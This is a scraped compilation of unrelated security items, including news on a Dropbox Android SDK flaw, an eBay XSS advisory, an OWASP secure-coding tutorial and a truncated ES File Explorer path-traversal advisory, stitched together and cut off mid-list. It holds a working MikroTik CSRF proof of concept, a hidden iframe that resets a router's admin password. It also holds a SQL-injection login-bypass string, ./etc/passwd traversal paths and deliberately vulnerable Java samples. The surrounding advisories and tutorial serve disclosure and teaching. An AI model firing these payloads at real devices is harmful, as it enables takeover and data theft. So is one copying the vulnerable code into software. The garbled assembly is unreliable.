TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SBSD Security Center Service DEPENDENCIES : wscsvc SERVICE_START_NAME : LocalSystem C:\Users\user> Source

Security researchers at IBM have uncovered a bug in cloud storage service provider Dropbox's software development kit (SDK) that potentially leaves millions of Android users open to attack. Researchers at IBM's X-Force Application Security Research warned that the 'DroppedIn' flaw affects many applications using the Dropbox SDK. "It allows attackers to connect applications on mobile devices to a Dropbox account they control," explained vice president of IBM Security Caleb Barlow. "This vulnerability may affect any Android app that uses the Dropbox SDK versions 1.5.4 to 1.6.1, and can be exploited locally using malware and remotely using drive-by techniques." A Dropbox spokesperson told V3 the firm issued an update fixing the flaw in December 2014 and added it could only be exploited in "very specific circumstances" on devices where the main Dropbox Android app was not installed. Barlow said despite the assurances hackers could still steal data from vulnerable systems without the patch. "The vulnerability allows attackers to execute malicious code during the log-in process that allows them to access the random number, called a 'nonce', that Dropbox uses as part of the authentication process," he said. "Once the attacker has the nonce, they can enter an access token that is also used to identify a user and then upload or download files into/from the victim's vulnerable app to the attacker's Dropbox account." He added to fully fix the problem application developers will have to install the SDK patch. "There are many apps that rely on the Dropbox SDK, including Yahoo Mail, Microsoft Office Mobile, AgileBits 1Password, and several productivity, photo editing/sharing tools," he said. "Application developers that use the Android Dropbox SDK need to upgrade their version to at least 1.6.2 or above ASAP which is where the patch for this vulnerability exists." The Dropbox spokesperson moved to allay these concerns telling V3 "most Android app developers using our SDK have updated their apps so users don't need to do anything." The news follows reports that application developers are failing to install critical security updates. Researchers at McAfee reported in February that a number of "popular" applications still do not include critical patches for the high-profile BERserk and Heartbleed Secure Sockets Layer flaws. Source

Threat Level: High Severity: High CVSS Severity score: 7.0 Impact: Complete Integrity, Confidentiality, and Availability violation. EBay Reference: #EIBBP-31480 Vulnerability: (1) Unauthenticated Cross-Site Scripting Vulnerability (1) Filtration Bypass Vendor Overview “eBay Inc. is an American multinational corporation and e-commerce company, providing consumer to consumer & business to consumer sales services via Internet. It is headquartered in San Jose, California, United States. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sales, the website has since expanded to include "Buy It Now" shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements (via Kijiji or eBay Classifieds); online event ticket trading (via StubHub); online money transfers (via PayPal) and other services. eBay was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is a multi-billion dollar business with operations localized in over thirty countries.” [1] [2] Description Application data utilizes in its output, user input that is not validated or properly encoded. The application is vulnerable to an unauthenticated Cross-Site Scripting attack. Vulnerabilities that permit these attacks, are widespread and persist anywhere a web application makes use of user input without any security validation controls. A malicious adversary can use this to compromise the trust of unsuspecting users, by tricking them into visiting a seemingly benign and trusted site. The malicious payload is embedded within a seemingly benign URL. This way an attacker can steal user credentials, to hijack a user’s session, to force a redirection to a heterogeneous third-party website, and thus to force a user’s browser to execute unsafe actions on behalf of the attacker. [3] [4] In this attack scenario it is noted that “Visitor -> Vendor” trust-levels are directly impacted. Read more: http://dl.packetstormsecurity.net/1503-exploits/eBay030315.pdf

1 Introduction The Dropbox SDK is a library that developers can download and add to their products. This library provides easy access to Dropbox features, such as downloading and uploading files, via a simple set of APIs. AppBrain provides statistics as to the prevalence of the use of the Dropbox SDK on Android [1]. According to these statistics, 0.31% of all applications use the Dropbox SDK. Of the top 500 apps in the Google Play Store, 1.41% use the Dropbox SDK. Interestingly, 1.32% of total app installations and 3.93% of app installations of the top 500 apps use the Dropbox SDK, respectively. While it is not a highly prevalent library, some extremely popular Android apps that may hold sensitive information use the Dropbox SDK, including Microsoft Office Mobile with over 10,000,000 downloads1 and AgileBits 1Password with over 100,000 downloads2 . The vulnerability that we discovered may affect any Android app that uses the Dropbox SDK versions 1.5.4-1.6.1. We examined 41 apps that use the Dropbox SDK for Android, out of which 31 apps (76%) were vulnerable to our attack (i.e. they used version 1.5.4-1.6.1). It’s noteworthy that the rest of the apps were vulnerable to a much simpler attack with the same consequences, but had been fixed by Dropbox with the 1.5.4 version of the SDK which they did not care to upgrade to. This paper is organized as follows. Section 2 gives a background on Inter-App Communication (IAC) in Android. Section 3 shows how IAC can be exploited in general locally by malware and remotely using driveby techniques. Section 4 describes how the Dropbox SDK for Android uses OAuth for app authorization. In 1https://play.google.com/store/apps/details?id=com.microsoft.office.officehub 2https://play.google.com/store/apps/details?id=com.agilebits.onepassword 1section 5 we deep-dive into the vulnerability we found within the Dropbox SDK for Android OAuth code. Section 6 presents a real attack, dubbed DroppedIn, that exploits the vulnerability. In section 7, we show that the threat is real by presenting case studies. We end with section 8 that presents a mitigation for the vulnerability. 2 Inter-App Communication (IAC) in Android Android applications are executed in a sandbox environment. The sandbox ensures data confidentiality and integrity as no application can access sensitive information held by another application without proper privileges. For example, Android’s stock browser application holds sensitive information such as cookies, cache and history which shouldn’t be accessed by third-party apps. The sandbox relies on several techniques including per-package Linux user-id assignment. Thus, resources, such as files, owned by one app cannot be accessed by default by other apps. While sandboxing is great for security, it may diminish interoperability as apps sometimes would like to talk to each other. Going back to the browser example, the browser would want to invoke the Google Play app when a user browsed to the Google Play website. In order to support this kind of functionality, Android provides high-level Inter-App Communication (IAC) mechanisms. This communication is usually done using special messages called Intents, which hold both the payload and the target application component. Intents can be sent explicitly, where the target application component is specified, or implicitly, where the target is left unspecified and is determined by Android according to other Intent parameters such as its URI scheme, action or category. 3 General Exploitation via Inter-App Communication The attack surface is greatly increased if the attacker can directly invoke application components, controlling the Intent’s payload. This is the case with exported application components. Such components can be attacked locally by malware. Activities, Android application components responsible for UI screens, can also be attacked remotely using drive-by exploitation techniques as shown by [2, 3]. In the local attack, illustrated by Figure 3.1, malware invokes the exported target application component with a malicious Intent (i.e. one that contains malicious data) by simply calling APIs such as Context.startActivity(Intent). In the case of remote drive-by exploitation, illustrated by Figure 3.2, a user is lured into browsing a malicious website. This site serves a web page that causes the browser to invoke the target activity with the malicious Intent. Read more: http://dl.packetstormsecurity.net/1503-exploits/exploiting-dropboxsdk-android.pdf

MikroTik RouterOS < v5.0 Admin Password Change CSRF Vulnerability by @SymbianSyMoh</b></h1></br> <input type="submit" value="Do it" onclick="var btn=document.createElement('IFRAME');btn.src=' [url]http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&password2=Pwn3D2015&button=ok';btn.width='0';btn.height='0';btn.id='myIframe';document.body.appendChild(btn);alert('Pwned[/url]') <http://s.bl-1.com/h/mPQQyg5?url=http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&password2=Pwn3D2015&button=ok%27;btn.width=%270%27;btn.height=%270%27;btn.id=%27myIframe%27;document.body.appendChild(btn);alert(%27Pwned%27)> ;"></br> </body> </html> Video PoC: [url]http://youtu.be/FHrvHJeLjLA[/url] <http://s.bl-1.com/h/mPQQ237?url=http://youtu.be/FHrvHJeLjLA> -- *Best Regards**,**,* *Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist & Bug Bounty Hunter. LinkedIn <http://s.bl-1.com/h/mPQQ6S9?url=https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae <http://s.bl-1.com/h/mPQQCrC?url=http://goo.gl/cNrVpL> <http://s.bl-1.com/h/mPQQHFF?url=https://www.linkedin.com/in/symbiansymoh> Facebook <http://s.bl-1.com/h/mPQQNfH?url=https://fb.com/symbiansymoh>Twitter <http://s.bl-1.com/h/mPQQS2K?url=https://twitter.com/symbiansymoh> Source

In the first part of this series, we covered the Top 5 OWASP ProActive Controls and learned how they can prove to be of great use in securing applications. In this part, we will look at the last 5 OWASP ProActive Controls and learn more about them. Protect Data and Privacy It helps to protect our data inside a database. Sensitive data like passwords, credit card details and bank account details etc. should be stored in encrypted or hashed format inside a database or chosen data storage. One should not use encryption and hashing interchangeably, as encryption and hashing are entirely different from each other. Encryption is used to convert readable text or plain text into unreadable text or cipher text. Encryption is a two way data conversion technique, meaning data which is encrypted can also be decrypted (if you have the decryption key). Encryption can be done in two main ways: Symmetric method Asymmetric method Symmetric encryption or Secret Key Cryptography (SKC) uses a secret key for encryption and decryption. It means the receiver uses same key that was used for encryption to decrypt. Asymmetric method or Public Key Cryptography (PKC) uses two sets of keys to perform encryption and decryption. One is a public key and another is a private key. Public Key is used for data encryption and Private Key is used for data decryption. Depending upon your application requirement, developers can choose between the two encryption methods. Hashing is different from encryption; unlike encryption, it is a one way process. It means data that’s converted into hashed format can never be converted into plain text. An application cannot choose hashing or encryption just like that. A ecure storage technique is chosen depending upon the data that has to be stored securely. At some time in the future, if the sensitive data is to be shown to the user in plaintext, then encryption is the best option (plaintext <->ciphertext). If the sensitive data is to be stored for some validation or authentication or verification, then hashing should be stored (Plaintext -> Hash). For example: Sensitive information between the client and server should also be in encrypted form. Hyper Text Transfer Protocol Secure (HTTPS) should be used instead of Hyper Text Transfer Protocol (HTTP) whenever any sensitive information is to be transmitted. When HTTPS is used, client server communication is encrypted using supported technology like SSLv2, SSLv3, TLS1.0, and TLS1.2. It is especially used to protect highly confidential data like online banking. The port number for HTTP is 80 and for HTTPS is 443. Implement Logging and intrusion Detection In an application, most requests are received using GET, POST, PUT, and DELETE methods. A request sent can be either a malicious request or a clean request. Malicious requests are those requests which contain attack vectors like SQL Injection, XSS, Unauthorized Data Access, etc. When there is public user activity or Intranet employee access, then the application should always keep track of all the activities taking place. Logging is very important in every application and one of the areas which is most neglected during development and deployment. Logging means storing log data about every request that is sent and received, such time, IP address, requested page, GET data, and POST data of a request. If a user is authenticated, then who is the user, when he logged in, when he logged out, etc. Since all user activity is being logged, it should also be noted that user sensitive data like password and financial details should NEVER be logged. Intrusion Detection means a malicious request with an attack vector has been detected and received by the application or not. If such a request has been received, then suitable actions like logging and request drop should be performed. For example, if a SQL Injection vulnerability exists on a login page, the application should have a feature to detect when SQL Injection is performed and should log time and from which IP address the attack originated, and then perform a suitable action on it. ModSecurity and OWASP ModSecurity Core Rule Set Project can prove to be of great use when you want to detect and/or prevent any malicious activity. Logging and intrusion detection is necessary to keep a record of every activity that takes place on an application. Intrusion detection is implemented along with logging to keep a check on when an attack or malicious data is received, so that it can be handled properly. Leverage Security Features of Frameworks and Security Libraries When developers start developing any application, either they don’t implement secure coding practices or use third party libraries for implementing security features. But most programming languages or development framework have built-in security functions and libraries which can be leveraged to implement security features in applications. Developers should use those built-in features instead of third party libraries. Recall OWASP Top 10 Vulnerabilities “A-9 Using Components with Known Vulnerabilities”. If third party components or libraries are used and any vulnerability is discovered in those components, then our application will automatically become vulnerable. It is recommended that developers should use security features provided by the programming language like escapeHtml() of httputils provided by Apache Commons Lang in Java and htmlentities() in PHP, which can be used to mitigate Cross-Site Scripting (XSS) vulnerability. But it is a known fact that industry tested security features are not readily available in programming languages. In such a case where useful and required security features or libraries are not available in the programming language you are using, then industry trusted and tested security libraries should be used. One of the well-known OWASP projects for this purpose is the OWASP ESAPI Project, which helps developers to implement security controls in their applications. For example: In Java we have security functions like escapeHtml() which can be used to mitigate XSS. String name = StringEscapeUtils.escapeHtml(request.getParameter(“name”)); PreparedStatement is used to mitigate SQL Injection. PreparedStatement ps=(PreparedStatement) con.prepareStatement(“select * from users where username=? and password=? limit 0,1?); Using built-in security features ensures that you don’t have to use unnecessary libraries you are not confident in or have security tested. Include Security-Specific Requirements When a software or web application development is to be started, then software requirements are laid out, which takes place in the early stage of an SDLC. As software requirements are mentioned initially in any project, security requirements should also be mentioned. Security requirements, if being made part of an SDLC, can help in implementing security inside the application and also identifying the key areas which can be exploited. According to OWASP Proactive Controls, three security requirements are important: Security features and functions; Business logic abuse cases; And data classification and privacy requirements. Security features and function\ All security details, such as application features, modules, database details, modules functioning and security implementation in modules should be mentioned in an application. It should be defined that all secure coding practices in any application should be implemented at the time of development. Business logic abuse cases When any application is designed, there is a way to access data and to perform operations. For example, when a user is performing an online banking transaction, some details are required within a well-defined process: Login to bank account. Choose your account to transfer from. Choose amount and destination account to transfer to. Enter profile password. Enter OTP password received on registered phone number. Confirm transaction. Wait for success message. All these steps define a data flow diagram or business logic. Now these details can have some weaknesses, which can make them vulnerable. When the business logic has been listed, key areas of weakness can be identified, and areas where security can be beefed up can be identified too. For example: User should not be able to choose someone else’s bank account as source account of transfer. User should not be able to bypass profile password requirement. OTP should be valid only once and for that account only. Data classification and privacy requirement Data classification and requirement should be decided at the time of development. When any application interacts with the user, then user data is received and stored. The answers to these questions should be decided in advance: Which data is to be accepted from the user? Is that data sensitive or not? Is that data to be stored? If data is sensitive, then should the application decide if it will be stored in encrypted or hashed format? If bank details are stored, then those details should be verified and validated by the application. Data authorization should also be decided at an initial stage, like who can access, delete and modify data. Since the application will be dealing with users and operations on user data. It is critical to maintain logs for all activities. Logging of activity was discussed above in the “Implement Logging and Intrusion Detection” section. Security Design and Architecture In the last one to nine OWASP ProActive Controls, we saw how to implement security in our code, which areas to secure, how to secure and what components can be used to help you implement better security in your application. In the last ProActive Control, we discuss the other areas of application security which can prove to be of great use and should not be neglected. OWASP has defined three key areas to take care of when developing any application: Know Your Tools Tiering, Trust and Dependencies Manage the Attack Surface Know Your Tools Every application is built using some server side language, client side language, database or no database, etc. Each component used could be the source of opening a security vulnerability in your application and server. For example, using an outdated version of Struts Framework can lead to a user exploiting remote code execution on it, or an older version of PHP leading to the same consequence. Similar is the case for databases and every other component which is used to build an application. So before starting any application development, it should be made clear what components can or may lead to a vulnerable application in the present or near future. Tiering, Trust and Dependencies Each layer of the whole application is called a tier. With each tier there is an associated level of risk and vulnerabilities that can crop in. For every tier — be it client side, server side, database, or anything — the risk associated with it should be calculated, and necessary mitigations should be implemented. When an application is interacting with user input and user data, trust is the only factor which decides which operation should be performed, when to perform, and on what to perform. An authentication page not implemented properly will have a poor trust level and will allow malicious users to access others’ data. In the worst case, it will result in a user transferring funds or accessing confidential company data without proper authorization. Application development involves using several components all together and making sure that each component will work with others. This is the case of dependency, where X component depends upon Y component for its proper functioning. It is very common to use older components to maintain reliability and proper functioning. But each dependency should be thoroughly checked, or else it can create an unwanted weakness inside the application. Manage Attack Surface The attack surface is the whole combined application including software, hardware, logic, client controls, server controls. Everything from physical, digital, to logical makes the attack surface. Any part of a setup if and when found to be vulnerable can act as an open entry gate for a malicious user to perform an action. Developers are usually not concerned about the web server software version the application will be deployed on. But older web server software like Apache or Struts can lead to an attacker successfully exploiting it and managing his/her way into the application and user data. Conclusion From OWASP ProActive Controls we learned how an application can be secured and how to identify the key areas of every application that can all together help in strengthening our application and stored data. OWASP ProActive Controls are a good place to start training developers to implement secure coding practices and beef up the security of key areas of an application like authentication, authorization, user data access and storage. But ProActive Controls should not be looked upon as the only set of controls for application security. It is a good place to start developing skills and knowledge leading to continuous learning and habitual secure coding practices. Reference https://www.owasp.org/index.php/OWASP_Proactive_Controls Source

What is OWASP ProActive Controls? In one line, this project can be explained as “Secure Coding Practices by Developers for Developers“. OWASP ProActive Controls is a document prepared for developers who are developing or are new to developing software/application with secure software development. This OWASP project lists 10 controls that can help a developer implement secure coding and better security inside the application while it is being developed. Following these secure application development controls ensures that the key areas of the development cycle have secure coding along with traditional coding practices. The strength of this project is not just in the listed 10 controls but in the key references associated with it. Every control extends the knowledge and capabilities by mentioning existing OWASP or other open source projects that can be used to strengthen the security of an application. The ten controls defined by this project are: Parameterize Queries Encode Data Validate All Inputs Implement Appropriate Access Controls Establish Identity and Access Controls Protect Data and Privacy Implement Logging, Error Handling and Intrusion Detection Leverage Security Features of Frameworks and Security Libraries Include Security-Specific Requirements Design and Architect Security In Let us go deeper into each ProActive Control and see what it takes for us to implement it in the real world. PARAMETERIZE QUERIES One of the most dangerous attacks on a Web application and its backend data storage is SQL injection. It occurs when a user sends malicious data to an interpreter as an SQL query, which then manipulates the backend SQL statement. It is easy for an attacker to find a SQLi vulnerability using automated tools like SQLMap or by manual testing. The simplest and most popular attack vector used is: 1? or ‘1’= ‘1 Submitting it as a username and password or in any other field can lead to an authentication bypass in many cases. Here is an example of typical SQL injection in a user authentication module: String username= request.getParameter(“username”); String password= request.getParameter(“password”); Class.forName("com.mysql.jdbc.Driver"); Connection con = (Connection) DriverManager.getConnection("jdbc:mysql://database-server:3306/securitydb:", "root" ,"root"); Statement st= con.createStatement(); ResultSet rs=st.executeQuery("select * from users where username='"+username+"' and password='"+password+"' limit 0,1"); In this vulnerable code, the ‘Statement’ class is used to create a SQL statement, and at the same time it is modified by directly adding user input to it, then it is executed to fetch results from the database. Performing a simple SQLi attack in the username field will manipulate the SQL query, and an authentication bypass can take place. To stop a SQLi vulnerability, developers must prevent untrusted input from being interpreted as a part of a SQL query. It will lead to an attacker not being able to manipulate the SQL logic implemented on the server side. OWASP ProActive Controls recommends that developers should use parameterized queries only in combination with input validation when dealing with database operations. Here is an example of SQL query parameterization: String username=request.getParameter(“username”); String password=request.getParameter(“password”); Class.forName(“com.mysql.jdbc.Driver”); Connection con=( Connection) DriverManager.getConnection("jdbc:mysql://database-server:3306/securitydb:", "root" ,"root"); PreparedStatement ps=(PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1"); ps.setString(1,username); ps.setString(2,password); ResultSet rs=ps.executeQuery(); if(rs.next()) out.println("Login success"); else out.println("Login failed"); Using a parameterized query makes sure that the SQL logic is defined first and locked. Then the user input is added to it where it is needed, but treated as a particular data type string, integer, etc. as whole. In a database operation with a parameterized query in the backend, an attacker has no way to manipulate the SQL logic, leading to no SQL injection and database compromise. SQL injection vulnerability has been found and exploited in applications of very popular vendors like Yahoo! too. ENCODE DATA Data encoding helps to protect a user from different types of attacks like injection and XSS. Cross Site Scripting (XSS) is the most popular and common vulnerability in Web applications of smallest to biggest vendors with a Web presence or in their products. Web applications take user input and use it for further processing and storing in the database when ever needed. Also user input could be part of the HTTP response sent back to the user. Developers should always treat user input data as untrusted data. If user input at any point of time will be part of the response to user, then it should be encoded. If proper output encoding has been implemented, then even if malicious input was sent, it will not be executed and will be shown as plain text on the client side. It will help to solve a major web application vulnerability like XSS. Here is an example of XSS vulnerability: if(request.getMethod().equalsIgnoreCase("post")) { String name = request.getParameter("name"); if(!name.isEmpty()) { out.println("<br>Hi "+name+". How are you?"); } } In the above code, user input is not filtered and used, as it is part of message to be displayed to the user without implementing any sort of output encoding. Most common XSS vulnerabilities that affect users and are found in applications are of two types: Stored XSS Reflected XSS Stored XSS are those XSS which get stored on a sever like in a SQL database. Some part of the application fetches that information from the database and sends it to the user without properly encoding it. It then leads to malicious code being executed by the browser on the client side. Stored XSS can be carried out in public forums to conduct mass user exploitation. In Reflected XSS, the XSS script does not get stored on the server but can be executed by the browser. These attacks are delivered to victims via common communication mediums like e-mail or some other public website. By converting input data into its encoded form, this problem can be solved, and client side code execution can be prevented. Here is an example of output encoding of user input: if(request.getMethod().equalsIgnoreCase("post")) { String name = StringEscapeUtils.escapeHtml(request.getParameter("name")); if(!name.isEmpty()) { out.println("<br>Hi "+name+". How are you?"); } } In the next section you will see how input validation can secure an application. Combining input validation with data encoding can solve many problems of malicious input and safeguard the application and its users from attackers. OWASP has a project named OWASP ESAPI, which allows users to handle data in a secure manner using industry tested libraries and security functions. VALIDATE ALL INPUTS One of the most important ways to build a secure web application is to restrict what type of input a user is allowed to submit. This can be done by implementing input validation. Input validation means validating what type of input is acceptable and what is not. Input validation is important because it restricts the user to submit data in a particular format only, no other format is acceptable. This is beneficial to an application, because a valid input cannot contain malicious data and can be further processed easily. Important and common fields in a web application which require input validation are: First Name, Last Name, Phone Number, Email Address, City, Country and Gender. These fields have a particular format which has to be followed, especially email and phone number, which is very common. It is a known fact that first name and last name cannot have numbers in them; you cannot have a name as John39 *Bri@n. Such user input is treated as malicious and thus requires input validation. Input validation can be implemented on client side using JavaScript and on the server side using any server side language like Java, PHP etc. Implementing server side input validation is compulsory, whereas client side is optional but good to have. Now input validation is again of two types: Blacklist Whitelist The simplest example to explain the two can be: A security guard stops all guys wearing a red t-shirt who are trying to enter a mall, but anyone else can enter. This is a blacklist, because we are saying the red color is blocked. Whereas a whitelist says that guys wearing white, black and yellow t-shirt are allowed, and the rest all are denied entry. Similarly in programming, we define for a field what type of input and format it can have. Everything else is invalid. It is called whitelisting. Blacklisting is invalidating an input by looking for specific things only. For example, specifying that a phone number should be of 10 digits with only numbers is whitelist. Searching input for A-Z and then saying it is valid or not is blacklisting, because we are invalidating using alphabet characters only. Blacklisting has been proven to be weaker than whitelisting. In the above case, if a user enters 123456+890, then a blacklist will say it is valid because it does not contain A-Z. But it is wrong. Whereas a whitelist will say it contains a character that is not a number, and only numbers are allowed, so it is invalid. Input validation can be implemented in a web application using regular expressions. A regular expression is an object that describes a pattern of characters. These are used to perform pattern based matching on input data. Here is the example of a regular expression for first name: ^[a-zA-Z ]{3,30}$ This regular expression ensures that first name should include characters A-Z and a-z. The size of first name should be limited to 3-30 characters only. Let’s take another example of regular expression for username: ^[a-z0-9_]{3,16}$ Here this expression shows that username should include alphabets ‘a-z’, numbers ‘0-9? and special characters underscore ‘_’ only. The input length should be limited to 3-16 only. Email address validation can be performed using the following regular expression: ^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$ Depending upon the programming language a developer uses to build an application, regular expression can easily be implemented in it. Another advantage of regular expressions is that there are many industry tested regular expressions for all popular input types. So you don’t have to write one from scratch and then get it security tested. It is better to use industry tested regular expressions than writing one on your own (which in most cases will be flawed). OWASP has an Input Validation Cheat Sheet to help you implement proper input validation in your application. IMPLEMENT APPROPRIATE ACCESS CONTROLS Before we begin, it should be crystal clear that authentication is not same as authorization. Authentication takes care of your identity, whereas authorization makes sure that you have the authority or privilege to access a resource like data or some sensitive information. A simple real world example to show this can be: Alice visits Bob’s home. Her identity is known to Bob, so he allows her to enter her home (if she was not known to Bob then entry would have been denied, aka authentication failure). Alice is now inside Bob’s home. But she cannot open Bob’s family safe at home, because she is not authorized to do so. On the other hand, Bob’s sister Eve is known, so successful authentication occurs, and she is a family member, so she is authorized to access the family safe, aka successful authorization. Implementing authorization is one of the key components of application development. It has to be ensured at all times that access certain parts of the application should be accessible to users with certain privileges only. Authorization is the process of giving someone permission to do or have something. It is to be noted again that authentication is not equivalent to authorization. Many developers have a tough time handling authorization, and at some point leave a gap that gets exploited, leading to unauthorized data access. To solve this problem, access control or authorization checks should always be centralized. All user requests to access some page or database or any information should pass through the central access control check only. Access control checks should not be implemented at different locations in different application codes. If at any point in time you have to modify an access control check, then you will have to change it at multiple locations, which is not feasible for large applications. Access control should by default deny all requests which are from a user for a resource for which either access is restricted or an authorized entry has not been made. Layered Authorization Checks should be implemented. It means that the user’s request should be checked for authorization in layered manner instead of a haphazard manner. Below is an example: User requests “/protected” file access. Is user logged-in? Is user normal user or privileged user? Is user allowed access to the resource? Is resource marked as locked? f the access control check at any point in 1-5 fails, then the user will be denied access to the requested resource. OWASP Access Control Cheat Sheet can prove to be good resource for implementing access control in an application. ESTABLISH IDENTITY AND AUTHENTICATION CONTROLS Authentication is the process by which it is verified that someone is who they claim to be, or we can say it is the process of identifying individuals. Authentication is performed by entering username or password or any sensitive information. Authentication and identity are two components of accessing any kind of information that goes hand-in-hand. For example, if you want to access your bank account details or perform a transaction, you need to login into your bank account website. Successfully authenticating to your bank account proves that you are the owner of that account. From this discussion, it is clear that username and password are the elements of authentication that prove your identity. OWASP ProActive: Establish Identity and Authentication Controls says that all the modules of an application which are related to authentication and identity management should have proper security in place and secure all sensitive information. Also, an application should request for and store only the information which is absolutely needed, and nothing else. Sensitive information like password and account number should be either stored in encrypted or hashed format inside a database, so that it cannot be misused by a malicious user if he or she gains unauthorized access and decrypts it easily. Below is an example of an application that stores the user’s password in plaintext inside a MySQL database. String username=request.getParameter("username"); String password=request.getParameter("password"); PreparedStatement ps = (PreparedStatement) con.prepareStatement("insert into login_users values(?,?)"); ps.setString(1,username); ps.setString(2,password); Here the password is stored in plain text. If the database is compromised at the same time, the attacker will be able to access the user account easily. The attacker will be able to login to the user’s account using the username and password from the database, which is stored in plain text. But this vulnerability can be exploited by converting sensitive information into a hashed format, like in salted MD5 or SHA2 hash format or in encrypted form. Here is an example of hashing sensitive information before storing it in a SQL database: String username=request.getParameter("username"); String password=request.getParameter("password"); MessageDigest m = MessageDigest.getInstance("MD5"); m.update(s.getBytes(),0,s.length()); String calc_hash = new BigInteger(1,m.digest()).toString(16); if(calc_hash.length()<32) { calc_hash = "0"+calc_hash; } PreparedStatement ps = (PreparedStatement) con.prepareStatement("insert into login_users values(?,?,?)"); ps.setString(1,username); ps.setString(2,password); ps.setString(3,calc_hash); The above code shows that here sensitive information (i.e. password) is stored in a salted MD5 format. The salt is different for every new registration. If the database is compromised, then the attacker will have to find clear text for the hashed passwords, or else it will be of no use. Broken Session Management is also a type of vulnerability which exists in a web application that does not properly implement session management. For example, if a user logs out from his/her account, but he/she is redirected to some page, but session is not invalidated properly, a post-login page is opened without asking for re-authentication. Another example can be a session cookie for pre- and post-login being same. Vulnerable code: String username = request.getParameter("username"); String password = request.getParameter("password"); PreparedStatement ps=(PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1"); ps.setString(1,username); ps.setString(2,password); ResultSet rs=ps.executeQuery(); if(rs.next()) { session.setAttribute("useracc", rs.getString("username")); out.println("Login success"); } else { out.println("Login failed"); } Observe in the above code that the session cookie JSESSIONID remains the same for pre- and post-login. This vulnerability can be exploited by an attacker who has physical access to the machine and notes the value of session cookie pre-authentication. This attack is known as Session Fixation. This patched code will invalidate the session when authentication is successful and creates a new session cookie value. This changes the post-login session cookie value, and Session Fixation vulnerability cannot be exploited. String username=request.getParameter(“username”); String password=request.getParameter(“password”); PreparedStatement ps=(PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1"); ps.setString(1,username); ps.setString(2,password); ResultSet rs=ps.executeQuery(); if(rs.next()) { session.invalidate(); request.getSession(true); session.setAttribute("useracc", rs.getString("username")); out.println("Login success"); } else { out.println("Login failed"); } The session cookie value should never be predictable, and should comply with strong complexity for better security. Authentication and secure storage is not just limited to the username-password module of an application. Other key modules like forgot password and change password are also part of authentication. Financial data and personal information like SSN are some of the most important details a person is concerned with, so an application storing that data should make sure it is encrypted securely. OWASP has some key resources like: Authentication Cheat Sheet Session Management Cheat Sheet In this part of OWASP ProActive Controls, we discussed in depth how ProActive Controls 1-5 can be used in an application as a secure coding practice to safeguard it from well-known attacks. The controls discussed do not modify application development lifecycle, but ensure that application security is given the same priority as other tasks and can be carried out easily by developers. We will see the last 5 ProActive Controls in the next and final part. Reference: https://www.owasp.org/index.php/OWASP_Proactive_Controls Source

Document Title: =============== ES File Explorer v3.2.4.1 - Path Traversal Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1435 CVE-ID: ======= CVE-2015-1876 Release Date: ============= 2015-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1435 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== ES File Explorer is a free all-in-one including a file manager & application & tasks, support for online storage spaces (Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3), FTP & Samba client to explore the images, music, videos, documents and other files from your phone and your computer. It allows Android users around the world to manage their resources for free; you can see the files on your phone, access from anywhere and share them with others; it allows you to easily manage your photos or watch videos, stay connected on 3G, EDGE or WiFi, and share with friends. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.estrongs.android.pop ) Abstract Advisory Information: ============================== An independent vulnerability laboraotory researcher discovered a path traversal web vulnerability in the official ES File Explorer v3.2.4.1 mobile android web-application. Vulnerability Disclosure Timeline: ================================== 2015-02-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ES APP GROUP Product: ES File Explorer - Mobile Web Application (Android) 3.2.4.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A Path Traveral web vulnerability has been discovered in the official in the official ES File Explorer v3.2.4.1 mobile android web-application. The security vulnerability allows a remote attacker to unauthorized request local files and device system paths to compromise the application or device. The vulnerability is located in the `content://com.estrongs.files/system/` path request with the <file> context. The vulnerability can be exploited by local or remote attackers without user interaction. The attacker needs to replace the sdcard path request in the com.estrongs.files/system with a malicious path request like ./etc/passwd ./etc/hosts and continues the request. The attack vector is located on the application-side of the service and the request is http. The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromise Request Method(s): [+] POST & Sync Vulnerable Module(s): [+] content://com.estrongs.files/ Vulnerable Parameter(s): [+] path Affected Module(s): [+] content://com.estrongs.files/system/ Proof of Concept (PoC): ======================= The arbitrary code execution vulnerability can be exploited by remote attackers without user interaction or privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. --- PoC Session Logs --- Package: com.estrongs.android.pop Application Label: ES File Explorer Process Name: com.estrongs.android.pop Version: 3.2.4.1 Data Directory: /data/data/com.estrongs.android.pop APK Path: /data/app/com.estrongs.android.pop-2.apk UID: 10235 GID: [3003, 3002, 3001, 1015, 1028] Permissions: - android.permission.WRITE_SETTINGS - android.permission.CHANGE_WIFI_STATE - android.permission.CHANGE_NETWORK_STATE - android.permission.INTERNET - android.permission.SET_WALLPAPER - android.permission.ACCESS_NETWORK_STATE - android.permission.ACCESS_WIFI_STATE - com.android.launcher.permission.INSTALL_SHORTCUT - com.android.launcher.permission.UNINSTALL_SHORTCUT - android.permission.BLUETOOTH - 